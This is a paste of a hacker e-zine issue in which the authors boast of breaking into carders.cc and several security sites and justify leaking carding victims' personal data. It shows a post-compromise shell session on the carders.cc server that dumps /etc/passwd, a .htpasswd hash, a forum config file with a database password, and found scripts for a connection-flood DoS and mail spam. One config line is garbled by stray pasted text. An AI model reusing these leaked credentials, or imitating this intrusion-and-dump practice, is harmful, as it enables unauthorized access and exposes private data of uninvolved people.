· 10 years ago · Feb 06, 2016, 12:24 PM
1[EZINE] Owned and Exposed - ISSUE no 2
2
3 |\___/|
4 -=[ISSUE - NO 2]=- =) ^Y^ (=
5 -=[OF]=- \ ^ /
6 )=*=(
7 ______________________________ __ ____________ _ / \
8|.-----.--.--.--.-----.-----.--| | ___ ___ _| || | |
9|| _ | | | | | -__| _ | | . | | . || /| | | |\
10||_____|________|__|__|_____|_____| |__,|_|_|___|| \| | |_|/\
11| | | ______ |__//_// ___/ __
12| | | .-----.--.--.-----.| |.-----.--\_).--| ||
13| | | | -__|_ _| _ || || ||__ --| -__| _ ||
14| | | |_____|__.__| __|| || ||_____|_____|_____||
15|_/ \__________________________|__|___| || |___________________|
16 |______|
17------------------------.++-
18 / y-
19 / y-
20---------------------/ s/----------------------.++-
21 / ys+-. |\ / y-
22---------------\.../ /\ ys------/()/ / y-
23 sy \/ /'''\ \| / s/-
24------------------+-++s /-----' / s+-.
25---------------------/s /-------------\.../ /\ ys
26 -y s sy \/ /'''\
27-----------------------y s---------------------++s /-----'
28----------------------++' |\ /s /
29-------------------------------------/()/ -y ys
30 \| -y s
31-------------------------------------------------++'
32 |_______________
33,_._._._._._._._,_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _| carders.cc `\
34|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| inj3ct0r \
35 ~ Featuring ~ | ettercap \
36 _______________| |___________________\
37 /´ exploit-db | !
38 / backtrack |_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _,_._._._._._._._,
39 / free-hack |_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
40 /___________________| ~ and ~
41 !
42
43 Out of the Blue
44 into the Black
45,_._._._._._._._|____________________________________________________
46|_|_|_|_|_|_|_|_|___________________________________________________/
47 ~ INTRO ~ !
48
49Greetings followers, welcome to the second issue of owned and exp0sed.
50This file is encoded with UTF-8, so to view it properly use unicode.
51
52For those who are reading and laughing with us:
53We (your happy ninjas) wish you a
54
55 ,
56 _/^\_
57 < hax >
58 /.-.\
59 * MERRY * `/&\`
60 ,@.*;@,
61 /_o.I %_\
62 (`'--:o(_@;
63 /`;--.,__ `')
64 ;@`o % O,*`'`&\
65 (`'--)_@ ;o %'()\
66 * NINJA * /`;--._`''--._O'@;
67 /&*,()~o`;-.,_ `""`)
68 /`,@ ;+& () o*`;-';\
69 (`""--.,_0 +% @' &()\
70 /-.,_ ``''--....-'`)
71 /@%;o`:;'--,.__ __.'\
72 ;*,&(); @ % &^;~`"`o;@();
73 * HAXMAS * /(); o^~; & ().o@*&`;&%O\
74 `"="==""==,,,.,="=="==="`
75 __.----.(\-''#####---...___...-----._
76 '` \)_`"""""`
77 .--' `)
78 o( )_-\
79 `"""` `
80
81After our first release we got wind of some strange rumours. So just
82to be sure, we need to clarify some facts.
83
84So, who are we? First, lets talk about some things we are not. We are
85not an underground rival kiddy group. We are not a cyber mafia gang.
86We are the watchmen, the hackers who quietly observe the scene. If any
87skiddy community gets too big, we shut them down. If any lamer causes
88too much trouble, we shut them down. If any group keeps fucking stuff
89up, we stop them.
90
91So, why are we doing this? Some people say that being a vigilanty is
92wrong and that we are actually criminals. What can we say? This may be
93true. But the way we see it, if your not part of the solution, your
94part of the fucking problem. These idiots spread garbage across our
95scene and that is why they got owned. We take pride in what is left of
96the scene and we have serious problems with those who rape it.
97
98That's why we do what MUST be done.
99
100There are some things left we would like to say about carders.cc.
101First of all, they came back online after they got rm'ed. In the first
102issue we gave our word that we would make sure carders.cc would never
103come back. Well, we delivered on that promise in this issue. And as
104such carders.cc has once again been eliminated. Maybe this time they
105will get the hint.
106
107Also, Heise Security said that we were a rival group trying to
108capitalize on the demise of carders.cc. Apparently they weren't happy
109about our disclosure of the carders.cc database that included the
110personal information of carders.cc victims. What Heise forgot was that
111with this action, all the victims of carders.cc got the chance to
112realize that they were victims of fraud. You can try to say that our
113disclosure of the database put them at even greater risk of fraud but
114we disagree. What is more risky? Having your information secretly on
115an "underground" carding forum where it WILL be sold and used in
116frauduelent activity? Or, having it released so that you can be
117notified and take the appropriate action to mitigate the damage that
118has been done? I know which option I'd rather have.
119
120It is quite impressive how many people wrote about the Carders Hack
121without even bothering to read the zine. It is hilarious to see how
122the media works. Somebody writes an article, others copy information
123from it, others copy from it again. If we take a shit in a bowl. Then
124you eat that shit and puke it back into a different bowl for someone
125else to eat then they do the same thing, what do you have? "Two
126Journo's One Cup" is what you have. Fucking pathetic.
127
128On the other hand, we'd like to thank Brian Krebs. Even if some of his
129conclusions were way off the mark, he was still the first one to
130report about carders.cc and nearly every other article was based on
131Brian's work. At least you didn't eat shit and regurgitate it like the
132rest Brian, keep up the good work.
133
134Enough jibber jabber, let's get to business. You will soon realize
135that our targets vary:
136
137We owned ettercap because we were tired of people firing that shit up
138and pretending to be a l33th4x0r sheep who think they are the greatest
139hackerz with their ARP spoofing toolkitz.. If you have installed
140ettercap in the last 5 years you may want to check yo shit (;p).
141
142We owned offsec including backtrack and exploit-db because they are
143fucking security "expert" maggots (oops s/m/f/) who just fail so hard
144at security that we wonder why people really take their training
145courses. We imagine it's like open mic night at the laughatorium.
146
147We owned inj3ct0r because they are lameass wannabe milw0rm kids whose
148sole purpose in life is to disclose XSS 0dayz in Joomla (RSnake
149anyone?).
150
151We owned carders.cc (AGAIN) because they are unable to learn from
152their mistakes and keep spreading garbage around the underground.
153
154We owned free-hack because they are developing into one of the
155largest, most arrogant script-kiddie breeding grounds on the
156intertubez.
157
158,_._._._._._._._|____________________________________________________
159|_|_|_|_|_|_|_|_|___________________________________________________/
160 ~ carders.cc ~ !
161
162Here we go again. We hope that everybody was looking forward to see
163carders.cc getting owned again. We kept our word, didn't we? Let us
164begin:
165 ____________________________________________________________________
166| __ __ |
167| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. |
168| | _ | | | _ || _| -__|| _ | _ |_ _| |
169| |__ |_____|_____||____|_____||_____|_____|__.__| |
170|________|__|________________________________________________________|
171| |
172| The ninja guys piss on you and your half trained monkeys or |
173| whatever your leet underground team consists of. If you continue, |
174| you will be owned over again and rm'd twice. Also we will punch |
175| you in the face. |
176|____________________________________________________________________|
177
178Our lazy ninja squad was too drunk to come over and punch you in the
179fucking face. So we'll just stick to owning you for now. Carders.cc
180went down for a few days, but came back as if nothing had happened.
181They switched some server admins and installed some new software in
182the hopes that they would be safe. They turned on some l33t "security"
183settings like PHP's "Safe Mode" and "Openbase Dir", and they also
184disabled lots of functions. All in all they thought they were pretty
185locked down. Well, obviously they were fucking wrong. It's hard to
186harden a system when everything is backdoored and unfortunately we are
187just too ninja to get stopped by your silly protections. You can never
188stop us. We will always keep owning and exp0sing you.
189
190No. Matter. What. You. Try.
191
192$ uname -a
193FreeBSD sec1560.2x4.ru 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:02:08 UTC 2009 root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
194
195$ id
196uid=1000(carderscc) gid=1000(carderscc) groups=1000(carderscc)
197
198$ w
199 1:24AM up 11 days, 4:23, 0 users, load averages: 0.37, 0.48, 0.54
200USER TTY FROM LOGIN@ IDLE WHAT
201
202$ alias ls="ls -la"
203
204$ ls
205
206total 47
207drwxr-xr-x 17 root wheel 512 Jul 3 19:12 .
208drwxr-xr-x 17 root wheel 512 Jul 3 19:12 ..
209-rw-r--r-- 1 root wheel 798 Jan 18 2010 .cshrc
210-rw-r--r-- 1 root wheel 265 Jan 18 2010 .profile
211-r--r--r-- 1 root wheel 6206 Jan 18 2010 COPYRIGHT
212-rw-r--r-- 1 root wheel 0 Jul 3 19:12 a
213drwxr-xr-x 2 root wheel 1024 Jan 18 2010 bin
214drwxr-xr-x 7 root wheel 512 Jan 18 2010 boot
215dr-xr-xr-x 5 root wheel 512 Nov 24 21:14 dev
216drwxr-xr-x 22 root wheel 2560 Nov 1 23:54 etc
217drwxr-x--x 4 root wheel 512 Nov 1 23:54 home
218drwxr-xr-x 3 root wheel 1536 Jan 18 2010 lib
219drwxr-xr-x 2 root wheel 512 Apr 4 2010 libexec
220drwxr-xr-x 2 root wheel 512 Jan 18 2010 media
221drwxr-xr-x 2 root wheel 512 Jan 18 2010 mnt
222dr-xr-xr-x 1 root wheel 0 Dec 6 00:58 proc
223drwxr-xr-x 11 root wheel 1024 Nov 8 20:33 root
224drwxr-xr-x 2 root wheel 2560 Jan 18 2010 sbin
225lrwxr-xr-x 1 root wheel 11 Jan 18 2010 sys -> usr/src/sys
226drwxrwxrwt 11 root wheel 512 Dec 5 23:42 tmp
227drwxr-xr-x 15 root wheel 512 Jan 18 2010 usr
228drwxr-xr-x 23 root wheel 512 Nov 24 21:14 var
229
230$ cat /etc/passwd
231# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $
232#
233root:*:0:0:Charlie &:/root:/bin/csh
234toor:*:0:0:Bourne-again Superuser:/root:
235daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
236operator:*:2:5:System &:/:/usr/sbin/nologin
237bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
238tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
239kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
240games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
241news:*:8:8:News Subsystem:/:/usr/sbin/nologin
242man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
243sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
244smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
245mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
246bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
247proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
248_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
249_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
250uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
251pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
252www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
253nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
254mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
255postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
256carderscc:*:1000:1000:User &:/home/carderscc:/sbin/nologin
257cardersblog:*:1001:1001:User &:/home/cardersblog:/usr/sbin/nologin
258
259$ cd /root
260
261$ ls
262total 412628
263drwxr-xr-x 11 root wheel 1024 Nov 8 20:33 .
264drwxr-xr-x 17 root wheel 512 Jul 3 19:12 ..
265-rw------- 1 root wheel 1856 Dec 5 23:53 .bash_history
266-rw-r--r-- 1 root wheel 798 Jan 18 2010 .cshrc
267-rw------- 1 root wheel 2909 Dec 7 22:31 .history
268-rw-r--r-- 1 root wheel 155 Jan 18 2010 .k5login
269-rw------- 1 root wheel 61 Jul 5 21:44 .lesshst
270-rw-r--r-- 1 root wheel 303 Jan 18 2010 .login
271drwx------ 3 root wheel 512 Dec 6 02:34 .mc
272-rw------- 1 root wheel 641 Nov 8 20:33 .mysql_history
273-rw-r--r-- 1 root wheel 265 Jan 18 2010 .profile
274drwx------ 2 root wheel 512 Nov 7 17:20 .ssh
275-rw-r--r-- 1 root wheel 417314245 Oct 24 21:13 24_10_2010_carderscc_01.sql
276drwxr-xr-x 3 root wheel 512 Jul 3 00:34 backup
277drwxr-xr-x 4 root wheel 512 Nov 8 17:58 backups
278drwxr-xr-x 2 root wheel 512 Jul 20 2009 crack
279-rw-r--r-- 1 root wheel 3223 Jul 20 2009 crack.zip
280-rw-r--r-- 1 root wheel 85 Aug 9 03:31 ddos.php
281-rw-r--r-- 1 root wheel 168 Feb 1 2010 example.php
282drwxr-xr-x 3 root wheel 512 Jul 5 00:41 greensql
283-rw-r--r-- 1 root wheel 20 Aug 9 03:26 info.php
284-rw------- 1 root wheel 16877 Jul 29 20:44 mbox
285drwxr-xr-x 3 root wheel 512 Jul 3 18:59 php
286drwxr-xr-x 14 carderscc carderscc 1536 Nov 2 16:15 proftpd-1.3.3c
287-rw-r--r-- 1 root wheel 4885847 Oct 29 17:27 proftpd-1.3.3c.tar.gz
288drwxr-xr-x 2 root wheel 512 Nov 8 18:50 stylebackup
289
290Mad PHP-Codez again!
291
292$ cat ddos.php
293<?php
294while(1==1) {
295$fp = fsockopen("92.241.190.202", 80, $errno, $errstr, 30);
296}
297?>
298
299$ cat info.php
300<?php
301phpinfo();
302?>
303
304$ cat example.php
305<?php
306pcntl_fork();
307pcntl_fork();
308pcntl_fork();
309pcntl_fork();
310
311for ($i=0; $i<10; $i++) {
312echo ".";
313mail("jeka@2x4.ru","spammtest","this is a very big message...");
314}
315?>
316
317$ cd /home/carderscc
318
319$ ls
320total 18
321drwxr-x--- 7 carderscc www 512 Nov 18 20:45 .
322drwxr-x--x 4 root wheel 512 Nov 1 23:54 ..
323dr-xr-x--- 18 carderscc www 2560 Nov 12 23:32 carders.cc
324drwxrwxr-x 2 carderscc www 512 Dec 2 00:34 jabber.carders.cc
325drwxrwxr-x 11 carderscc www 3072 Nov 8 17:27 pma
326drwxrwxrwx 2 carderscc www 2048 Dec 6 00:40 temp
327drwxrwxr-x 5 carderscc www 512 Nov 6 19:47 vbseo
328
329$ cd carders.cc
330
331$ ls
332total 2286
333dr-xr-x--- 18 carderscc www 2560 Nov 12 23:32 .
334drwxr-x--- 7 carderscc www 512 Nov 18 20:45 ..
335-r-xr-x--- 1 carderscc www 1107 Dec 5 15:34 .htaccess
336-r-xr-x--- 1 carderscc www 20 Nov 12 18:16 .htpasswd
337dr-xr-x--- 4 carderscc www 2048 Nov 18 21:17 admincp
338-r-xr-x--- 1 carderscc www 40115 Oct 29 20:53 ajax.php
339-r-xr-x--- 1 carderscc www 75525 Oct 29 20:53 album.php
340-r-xr-x--- 1 carderscc www 19041 Oct 29 20:52 announcement.php
341dr-xr-x--- 2 carderscc www 512 Oct 29 22:39 archive
342-r-xr-x--- 1 carderscc www 8668 Oct 29 20:52 asset.php
343-r-xr-x--- 1 carderscc www 20406 Oct 29 20:52 assetmanage.php
344-r-xr-x--- 1 carderscc www 15710 Oct 29 20:52 attachment.php
345-r-xr-x--- 1 carderscc www 6658 Oct 29 20:52 attachment_inlinemod.php
346-r-xr-x--- 1 carderscc www 3449 Oct 29 20:52 blog_attachment.php
347-r-xr-x--- 1 carderscc www 96043 Oct 29 20:53 calendar.php
348-r-xr-x--- 1 carderscc www 43 Oct 29 20:52 clear.gif
349dr-xr-x--- 9 carderscc www 3584 Nov 2 00:32 clientscript
350-r-xr-x--- 1 carderscc www 15270 Oct 29 20:52 converse.php
351dr-xr-x--- 7 carderscc www 512 Nov 2 00:33 cpstyles
352-r-xr-x--- 1 carderscc www 3231 Oct 29 20:52 cron.php
353-r-xr-x--- 1 carderscc www 5139 Oct 29 20:52 css.php
354dr-xr-x--- 3 carderscc www 512 Nov 2 00:33 customavatars
355dr-xr-x--- 3 carderscc www 512 Nov 2 00:33 customgroupicons
356dr-xr-x--- 2 carderscc www 512 Nov 2 00:33 customprofilepics
357-r-xr-x--- 1 carderscc www 1707 Oct 29 20:52 editor.php
358-r-xr-x--- 1 carderscc www 46932 Oct 29 20:53 editpost.php
359-r-xr-x--- 1 carderscc www 1326 Oct 29 20:52 entry.php
360-r-xr-x--- 1 carderscc www 30006 Oct 29 20:53 external.php
361-r-xr-x--- 1 carderscc www 9888 Oct 29 20:52 faq.php
362-r-xr-x--- 1 carderscc www 5430 Jul 29 15:42 favicon.ico
363-r-xr-x--- 1 carderscc www 22568 Oct 29 20:53 forum.php
364-r-xr-x--- 1 carderscc www 42374 Oct 29 20:53 forumdisplay.php
365-r-xr-x--- 1 carderscc www 1988 Oct 29 20:52 global.php
366-r-xr-x--- 1 carderscc www 155760 Oct 29 20:54 group.php
367-r-xr-x--- 1 carderscc www 26072 Oct 29 20:53 group_inlinemod.php
368-r-xr-x--- 1 carderscc www 11470 Oct 29 20:53 groupsubscription.php
369-r-xr-x--- 1 carderscc www 8961 Oct 29 20:53 image.php
370dr-xr-x--- 28 carderscc www 1536 Nov 22 16:54 images
371dr-xr-x--- 9 carderscc www 6144 Nov 6 19:47 includes
372-r-xr-x--- 1 carderscc www 2318 Oct 29 20:53 index.php
373-r-xr-x--- 1 carderscc www 46943 Oct 29 20:53 infraction.php
374-r-xr-x--- 1 carderscc www 187725 Oct 29 20:54 inlinemod.php
375-r-xr-x--- 1 carderscc www 23934 Jul 29 21:10 invites.php
376-r-xr-x--- 1 carderscc www 6778 Aug 14 08:15 itrader.php
377-r-xr-x--- 1 carderscc www 14964 Aug 14 08:15 itrader_detail.php
378-r-xr-x--- 1 carderscc www 13515 Aug 14 08:15 itrader_feedback.php
379-r-xr-x--- 1 carderscc www 1405 Aug 14 08:15 itrader_global.php
380-r-xr-x--- 1 carderscc www 22171 Aug 14 08:15 itrader_main.php
381-r-xr-x--- 1 carderscc www 3970 Aug 14 08:15 itrader_report.php
382-r-xr-x--- 1 carderscc www 11362 Oct 29 20:53 joinrequests.php
383-r-xr-x--- 1 carderscc www 1643 Oct 29 20:53 list.php
384-r-xr-x--- 1 carderscc www 10869 Oct 29 20:53 login.php
385dr-xr-x--- 2 carderscc www 512 Nov 2 00:33 madp
386-r-xr-x--- 1 carderscc www 30166 Oct 29 20:53 member.php
387-r-xr-x--- 1 carderscc www 16314 Oct 29 20:53 member_inlinemod.php
388-r-xr-x--- 1 carderscc www 40267 Oct 29 20:53 memberlist.php
389-r-xr-x--- 1 carderscc www 22186 Oct 29 20:53 misc.php
390dr-xr-x--- 2 carderscc www 512 Nov 6 19:48 modcp
391-r-xr-x--- 1 carderscc www 76749 Oct 29 20:53 moderation.php
392-r-xr-x--- 1 carderscc www 6701 Oct 29 20:53 moderator.php
393-r-xr-x--- 1 carderscc www 17474 Oct 29 20:53 newattachment.php
394-r-xr-x--- 1 carderscc www 41001 Oct 29 20:53 newreply.php
395-r-xr-x--- 1 carderscc www 20107 Oct 29 20:53 newthread.php
396-r-xr-x--- 1 carderscc www 21724 Oct 29 20:53 online.php
397dr-xr-x--- 5 carderscc www 512 Nov 2 00:33 packages
398-r-xr-x--- 1 carderscc www 8018 Oct 29 20:53 payment_gateway.php
399-r-xr-x--- 1 carderscc www 13282 Oct 29 20:53 payments.php
400-r-xr-x--- 1 carderscc www 3984 Oct 29 20:53 picture.php
401-r-xr-x--- 1 carderscc www 16587 Oct 29 20:53 picture_inlinemod.php
402-r-xr-x--- 1 carderscc www 26091 Oct 29 20:53 picturecomment.php
403-r-xr-x--- 1 carderscc www 29260 Oct 29 20:53 poll.php
404-r-xr-x--- 1 carderscc www 10336 Oct 29 20:53 posthistory.php
405-r-xr-x--- 1 carderscc www 76507 Oct 29 20:54 postings.php
406-r-xr-x--- 1 carderscc www 7009 Oct 29 20:53 printthread.php
407-r-xr-x--- 1 carderscc www 79357 Oct 29 20:54 private.php
408-r-xr-x--- 1 carderscc www 163617 Oct 29 20:55 profile.php
409-r-xr-x--- 1 carderscc www 56285 Oct 29 20:54 register.php
410-r-xr-x--- 1 carderscc www 7216 Oct 29 20:53 report.php
411-r-xr-x--- 1 carderscc www 14687 Oct 29 20:53 reputation.php
412-r-xr-x--- 1 carderscc www 34539 Oct 29 20:54 search.php
413-r-xr-x--- 1 carderscc www 22632 Oct 29 20:54 sendmessage.php
414-r-xr-x--- 1 carderscc www 12407 Oct 29 20:54 showgroups.php
415-r-xr-x--- 1 carderscc www 12660 Oct 29 20:54 showpost.php
416-r-xr-x--- 1 carderscc www 80037 Oct 29 20:54 showthread.php
417dr-xr-x--- 2 carderscc www 512 Nov 2 00:33 signaturepics
418dr-xr-x--- 2 carderscc www 512 Nov 2 00:32 store_sitemap
419-r-xr-x--- 1 carderscc www 38784 Oct 29 20:54 subscription.php
420-r-xr-x--- 1 carderscc www 5321 Oct 29 20:54 tags.php
421-r-xr-x--- 1 carderscc www 8722 Oct 29 20:54 threadrate.php
422-r-xr-x--- 1 carderscc www 11068 Oct 29 20:54 threadtag.php
423-r-xr-x--- 1 carderscc www 61 Oct 29 20:52 uploadprogress.gif
424-r-xr-x--- 1 carderscc www 39639 Oct 29 20:54 usercp.php
425-r-xr-x--- 1 carderscc www 20956 Oct 29 20:54 usernote.php
426-r-xr-x--- 1 carderscc www 16518 Jul 29 16:35 vaispy.php
427dr-xr-x--- 13 carderscc www 1024 Nov 2 00:32 vb
428dr-xr-x--- 4 carderscc www 512 Nov 6 19:48 vbseo
429-r-xr-x--- 1 carderscc www 45239 Nov 6 19:48 vbseo.php
430-r-xr-x--- 1 carderscc www 4112 Nov 6 19:47 vbseocp.php
431-r-xr-x--- 1 carderscc www 27801 Oct 29 20:54 visitormessage.php
432-r-xr-x--- 1 carderscc www 1647 Oct 29 20:54 widget.php
433-r-xr-x--- 1 carderscc www 3769 Oct 29 20:54 xmlsitemap.php
434
435$ cat .htpasswd
436ddos:XScRLnTwdeJ6k
437
438$ cat includes/config.php
439<?php
440/*======================================================================*\
441|| #################################################################### ||
442|| # vBulletin 4.0.3 Patch Level 1
443|| # ---------------------------------------------------------------- # ||
444|| # All PHP code in this file is ©2000-2010 vBulletin Solutions Inc. # ||
445|| # This file may not be redistributed in whole or significant part. # ||
446|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
447|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
448|| #################################################################### ||
449\*======================================================================*/
450
451/*-------------------------------------------------------*\
452| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
453+---------------------------------------------------------+
454| If you get any errors while attempting to connect to |
455| MySQL, you will need to email your webhost because we |
456| cannot tell you the correct values for the variables |
457| in this file. |
458\*-------------------------------------------------------*/
459
460 // ****** DATABASE TYPE ******
461 // This is the type of the database server on which your vBulletin database will be located.
462 // Valid options are mysql and mysqli, for slave support add _slave. Try to use mysqli if you are using PHP 5 and MySQL 4.1+
463 // for slave options just append _slave to your preferred database type.
464$config['Database']['dbtype'] = 'mysql';
465
466 // ****** DATABASE NAME ******
467 // This is the name of the database where your vBulletin will be located.
468 // This must be created by your webhost.
469$config['Database']['dbname'] = 'carderscc_01';
470
471 // ****** TABLE PREFIX ******
472 // Prefix that your vBulletin tables have in the database.
473$config['Database']['tableprefix'] = '';
474
475 // ****** TECHNICAL EMAIL ADDRESS ******
476 // If any database errors occur, they will be emailed to the address specified here.
477 // Leave this blank to not send any emails when there is a database error.
478$config['Database']['technicalemail'] = 'dbmaster@example.com';
479
480 // ****** FORCE EMPTY SQL MODE ******
481 // New versions of MySQL (4.1+) have introduced some behaviors that are
482 // incompatible with vBulletin. Setting this value to "true" disables those
483 // behaviors. You only need to modify this value if vBulletin recommends it.
484$config['Database']['force_sql_mode'] = false;
485
486
487
488 // ****** MASTER DATABASE SERVER NAME AND PORT ******
489 // This is the hostname or IP address and port of the database server.
490 // If you are unsure of what to put herecat ddos.php
491
492
493
494
495, leave the default values.
496$config['MasterServer']['servername'] = 'localhost';
497$config['MasterServer']['port'] = 3306;
498
499 // ****** MASTER DATABASE USERNAME & PASSWORD ******
500 // This is the username and password you use to access MySQL.
501 // These must be obtained through your webhost.
502$config['MasterServer']['username'] = 'carderscc_01';
503$config['MasterServer']['password'] = 'VGZU76f3zgugdew&5gd3ugz&gd3uzguzg$dh3jgduzgdUGZDufe76g3d';
504
505 // ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
506 // This option allows you to turn persistent connections to MySQL on or off.
507 // The difference in performance is negligible for all but the largest boards.
508 // If you are unsure what this should be, leave it off. (0 = off; 1 = on)
509$config['MasterServer']['usepconnect'] = 0;
510
511
512
513 // ****** SLAVE DATABASE CONFIGURATION ******
514 // If you have multiple database backends, this is the information for your slave
515 // server. If you are not 100% sure you need to fill in this information,
516 // do not change any of the values here.
517$config['SlaveServer']['servername'] = '';
518$config['SlaveServer']['port'] = 3306;
519$config['SlaveServer']['username'] = '';
520$config['SlaveServer']['password'] = '';
521$config['SlaveServer']['usepconnect'] = 0;
522
523
524
525 // ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
526 // This setting allows you to change the name of the folders that the admin and
527 // moderator control panels reside in. You may wish to do this for security purposes.
528 // Please note that if you change the name of the directory here, you will still need
529 // to manually change the name of the directory on the server.
530$config['Misc']['admincpdir'] = 'admincp';
531$config['Misc']['modcpdir'] = 'modcp';
532
533 // Prefix that all vBulletin cookies will have
534 // Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
535$config['Misc']['cookieprefix'] = 'bb';
536
537 // ******** FULL PATH TO FORUMS DIRECTORY ******
538 // On a few systems it may be necessary to input the full path to your forums directory
539 // for vBulletin to function normally. You can ignore this setting unless vBulletin
540 // tells you to fill this in. Do not include a trailing slash!
541 // Example Unix:
542 // $config['Misc']['forumpath'] = '/home/users/public_html/forums';
543 // Example Win32:
544 // $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
545$config['Misc']['forumpath'] = '';
546
547
548
549 // ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
550 // The users specified here will be allowed to view the admin log in the control panel.
551 // Users must be specified by *ID number* here. To obtain a user's ID number,
552 // view their profile via the control panel. If this is a new installation, leave
553 // the first user created will have a user ID of 1. Seperate each userid with a comma.
554$config['SpecialUsers']['canviewadminlog'] = '4835,9816';
555
556 // ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
557 // The users specified here will be allowed to remove ("prune") entries from the admin
558 // log. See the above entry for more information on the format.
559$config['SpecialUsers']['canpruneadminlog'] = '4835,9816';
560
561 // ****** USERS WITH QUERY RUNNING PERMISSIONS ******
562 // The users specified here will be allowed to run queries from the control panel.
563 // See the above entries for more information on the format.
564 // Please note that the ability to run queries is quite powerful. You may wish
565 // to remove all user IDs from this list for security reasons.
566$config['SpecialUsers']['canrunqueries'] = '4835,9816';
567
568 // ****** UNDELETABLE / UNALTERABLE USERS ******
569 // The users specified here will not be deletable or alterable from the control panel by any users.
570 // To specify more than one user, separate userids with commas.
571$config['SpecialUsers']['undeletableusers'] = '';
572
573 // ****** SUPER ADMINISTRATORS ******
574 // The users specified below will have permission to access the administrator permissions
575 // page, which controls the permissions of other administrators
576$config['SpecialUsers']['superadministrators'] = '4835,9816';
577
578 // ****** DATASTORE CACHE CONFIGURATION *****
579 // Here you can configure different methods for caching datastore items.
580 // vB_Datastore_Filecache - to use includes/datastore/datastore_cache.php
581 // vB_Datastore_APC - to use APC
582 // vB_Datastore_XCache - to use XCache
583 // vB_Datastore_Memcached - to use a Memcache server, more configuration below
584// $config['Datastore']['class'] = 'vB_Datastore_Filecache';
585
586 // ******** DATASTORE PREFIX ******
587 // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
588 // than one set of forums installed on your host, you *may* need to use a prefix
589 // so that they do not try to use the same variable within the cache.
590 // This works in a similar manner to the database table prefix.
591// $config['Datastore']['prefix'] = '';
592
593 // It is also necessary to specify the hostname or IP address and the port the server is listening on
594/*
595$config['Datastore']['class'] = 'vB_Datastore_Memcached';
596$i = 0;
597// First Server
598$i++;
599$config['Misc']['memcacheserver'][$i] = '127.0.0.1';
600$config['Misc']['memcacheport'][$i] = 11211;
601$config['Misc']['memcachepersistent'][$i] = true;
602$config['Misc']['memcacheweight'][$i] = 1;
603$config['Misc']['memcachetimeout'][$i] = 1;
604$config['Misc']['memcacheretry_interval'][$i] = 15;
605*/
606
607// ****** The following options are only needed in special cases ******
608
609 // ****** MySQLI OPTIONS *****
610 // When using MySQL 4.1+, MySQLi should be used to connect to the database.
611 // If you need to set the default connection charset because your database
612 // is using a charset other than latin1, you can set the charset here.
613 // If you don't set the charset to be the same as your database, you
614 // may receive collation errors. Ignore this setting unless you
615 // are sure you need to use it.
616$config['Mysqli']['charset'] = 'latin1';
617
618 // Optionally, PHP can be instructed to set connection parameters by reading from the
619 // file named in 'ini_file'. Please use a full path to the file.
620 // Example:
621 // $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
622$config['Mysqli']['ini_file'] = '/etc/my.cnf';
623
624// Image Processing Options
625 // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
626$config['Misc']['maxwidth'] = 2592;
627$config['Misc']['maxheight'] = 1944;
628
629/*======================================================================*\
630|| ####################################################################
631|| #
632|| # CVS: $RCSfile$ - $Revision: 32878 $
633|| ####################################################################
634\*======================================================================*/
635
636$ cd ..
637
638$ cd jabber.carders.cc
639
640$ ls
641total 812
642drwxrwxr-x 2 carderscc www 512 Dec 2 00:34 .
643drwxr-x--- 7 carderscc www 512 Nov 18 20:45 ..
644-rwxrwxr-x 1 carderscc www 7948 Apr 28 2008 AC_OETags.js
645-rwxrwxr-x 1 carderscc www 629979 Apr 28 2008 SparkWeb.swf
646-rw-r--r-- 1 carderscc www 128693 Dec 2 00:34 c100.txt
647-rwxrwxr-x 1 carderscc www 3638 Apr 28 2008 favicon.ico
648-rwxrwxr-x 1 carderscc www 1272 Apr 28 2008 history.htm
649-rwxrwxr-x 1 carderscc www 1292 Apr 28 2008 history.js
650-rwxrwxr-x 1 carderscc www 2656 Apr 28 2008 history.swf
651-rwxrwxr-x 1 carderscc www 14590 Jun 30 16:00 index.html
652-rwxrwxr-x 1 carderscc www 2518 Apr 28 2008 osxmousewheel.js
